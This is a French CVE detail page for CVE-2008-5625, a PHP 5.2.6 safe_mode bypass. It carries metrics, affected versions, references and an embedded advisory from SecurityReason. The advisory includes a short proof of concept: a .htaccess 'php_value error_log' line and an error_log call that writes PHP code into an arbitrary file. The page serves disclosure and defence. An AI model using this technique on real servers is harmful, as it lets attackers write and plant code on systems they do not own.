CVE-2008-5625 : Détail

CVE-2008-5625

A01-Broken Access Control
1.4%V3
Network
2008-12-17
16h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

PHP 5 before 5.2.7 does not enforce the error_log safe_mode restrictions when safe_mode is enabled through a php_admin_flag setting in httpd.conf, which allows context-dependent attackers to write to arbitrary files by placing a "php_value error_log" entry in a .htaccess file.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 7171

Date de publication : 2008-11-19 23h00 +00:00
Auteur : SecurityReason
EDB Vérifié : Yes

[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ] Author: Maksymilian Arciemowicz (cXIb8O3) securityreason.com Date: - - Written: 10.11.2008 - - Public: 20.11.2008 SecurityReason Research SecurityAlert Id: 57 CWE: CWE-264 SecurityRisk: Medium Affected Software: PHP 5.2.6 Advisory URL: http://securityreason.com/achievement_securityalert/57 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. error_log They allow you to define your own error handling rules, as well as modify the way the errors can be logged. This allows you to change and enhance error reporting to suit your needs. - --- 0. error_log const. bypassed by php_admin_flag --- The main problem is between using safe_mode in global mode php.ini­: safe_mode = On and declaring via php_admin_flag <Directory "/www"> ... php_admin_flag safe_mode On </Directory> When we create some php script in /www/ and try call to: ini_set("error_log", "/hack/"); or in /www/.htaccess php_value error_log "/hack/bleh.php" Result: Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0 Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 It was for safe_mode declared in php.ini. But if we use php_admin_flag safe_mode On in httpd.conf, we will get only Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in /www/phpinfo.php on line 4 syntax in .htaccess php_value error_log "/hack/blehx.php" is allowed and bypass safe_mode. example exploit: error_log("<?php phpinfo(); ?>", 0); - --- 2. How to fix --- Fixed in CVS http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup Note: Do not use safe_mode as a main safety. --- 3. Greets --- sp3x Infospec schain p_e_a pi3 - --- 4. Contact --- Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: cxib [at] securityreason [dot] com GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg http://securityreason.com http://securityreason.pl # milw0rm.com [2008-11-20]

Products Mentioned

Configuraton 0

Php>>Php >> Version To (including) 5.2.6

Php>>Php >> Version 5.0.0

Php>>Php >> Version 5.0.0

Php>>Php >> Version 5.0.0

Php>>Php >> Version 5.0.0

Php>>Php >> Version 5.0.0

Php>>Php >> Version 5.0.0

Php>>Php >> Version 5.0.0

Php>>Php >> Version 5.0.0

Php>>Php >> Version 5.0.1

Php>>Php >> Version 5.0.2

Php>>Php >> Version 5.0.3

Php>>Php >> Version 5.0.4

Php>>Php >> Version 5.0.5

Php>>Php >> Version 5.1.0

Php>>Php >> Version 5.1.1

Php>>Php >> Version 5.1.2

Php>>Php >> Version 5.1.3

Php>>Php >> Version 5.1.4

Php>>Php >> Version 5.1.5

Php>>Php >> Version 5.1.6

Php>>Php >> Version 5.2.0

Php>>Php >> Version 5.2.1

Php>>Php >> Version 5.2.2

Php>>Php >> Version 5.2.3

Php>>Php >> Version 5.2.4

Php>>Php >> Version 5.2.5

Références

http://marc.info/?l=bugtraq&m=125631037611762&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=124654546101607&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=125631037611762&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.securityfocus.com/bid/32383
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/achievement_securityalert/57
Tags : third-party-advisory, x_refsource_SREASONRES
http://osvdb.org/52205
Tags : vdb-entry, x_refsource_OSVDB
http://www.mandriva.com/security/advisories?name=MDVSA-2009:045
Tags : vendor-advisory, x_refsource_MANDRIVA
http://marc.info/?l=bugtraq&m=124654546101607&w=2
Tags : vendor-advisory, x_refsource_HP
https://www.exploit-db.com/exploits/7171
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/35650
Tags : third-party-advisory, x_refsource_SECUNIA